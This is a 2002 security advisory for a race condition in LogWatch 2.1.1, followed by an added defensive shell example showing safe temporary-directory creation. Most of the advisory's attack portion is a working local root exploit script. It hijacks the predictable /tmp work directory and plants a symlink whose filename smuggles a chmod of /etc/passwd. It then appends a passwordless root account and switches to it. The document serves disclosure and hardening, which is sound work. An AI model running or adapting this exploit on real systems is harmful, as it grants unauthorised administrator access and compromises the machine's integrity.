LogWatch Race Condition Vulnerability

Published: 2002-03-29
Updated: 2002-03-29
Severity: High
Threat level: Local administrator privileges
Error type: Race condition
Exploitation method: Server mode

Affected systems

LogWatch 2.1.1

Detailed description

LogWatch is a customizable log analysis system that parses the system logs for a time period you specify and builds a detailed report.

Red Hat Linux 7.2 installs LogWatch 2.1.1 by default. A race condition in its handling of temporary directory creation allows a local user to gain administrator privileges.

Test code

cat > logwatch211.sh <<EOF
#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak <spybreak@host.sk>

SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/

echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak <spybreak@host.sk>'
echo
echo "Waiting for LogWatch to be executed"

while :; do
  set `ps -o pid -C $SERVANT`
  if [ -n "$2" ]; then
    mkdir /tmp/logwatch.$2
    ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
    break;
  fi
done

echo "Waiting for LogWatch to finish it's work"

while :; do
  set `ps -o pid -C $SERVANT`
  if [ -z "$2" ]; then
    ls -l /etc/passwd|mail root
    echo master::0:0:master:/root:/bin/bash >> /etc/passwd
    break;
  fi
done

su master
EOF

Solution

None yet.

Related information

Spybreak (spybreak@host.sk)

Reference: http://archives.neohapsis.com/archives/bugtraq/2002-03/0330.html
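
The test code above depends on the work directory name, /tmp/logwatch.<PID>, being predictable and on a directory that already exists under that name being used as-is. The following is an added example, not LogWatch code and not part of the original advisory: it contrasts that pattern with atomic private creation and a check before use. The function names are hypothetical, and the way LogWatch 2.1.1 creates its directory is an assumption drawn from the test code.

```shell
#!/bin/sh
# Added example, not LogWatch code. All function names are hypothetical.

# Weak pattern (assumed): predictable name, and mkdir -p accepts a directory
# that somebody else created first, together with whatever it contains.
workdir_predictable() {
    dir="$1/logwatch.$2"            # $1 = base directory, $2 = PID
    mkdir -p "$dir" || return 1
    printf '%s\n' "$dir"
}

# Hardened: mktemp -d picks an unpredictable name and never reuses an
# existing path; the directory is created with mode 0700.
workdir_private() {
    ( umask 077 && mktemp -d "$1/logwatch.XXXXXXXXXX" )
}

# Check before use: a real directory (not a symlink), owned by the caller,
# no group/other permission bits, and empty.
workdir_is_trustworthy() {
    [ -d "$1" ] && [ ! -L "$1" ] || return 1
    [ -O "$1" ] || return 1
    case $(ls -ld "$1") in drwx------*) ;; *) return 1 ;; esac
    [ -z "$(ls -A "$1")" ]
}

# Constructed scenario in a scratch directory standing in for /tmp:
# a directory with the predictable name already exists and holds an entry.
demo() {
    base=$(mktemp -d) || return 1
    mkdir "$base/logwatch.4242" && : > "$base/logwatch.4242/cron"
    weak=$(workdir_predictable "$base" 4242)
    safe=$(workdir_private "$base")
    for d in "$weak" "$safe"; do
        if workdir_is_trustworthy "$d"; then verdict=trusted; else verdict=REJECTED; fi
        echo "${d#"$base"/} -> $verdict"
    done
    rm -rf "$base"
}
demo
```

A privileged job that finds its work directory fails this check should abort rather than clean up and continue, since the contents were not placed there by the job itself.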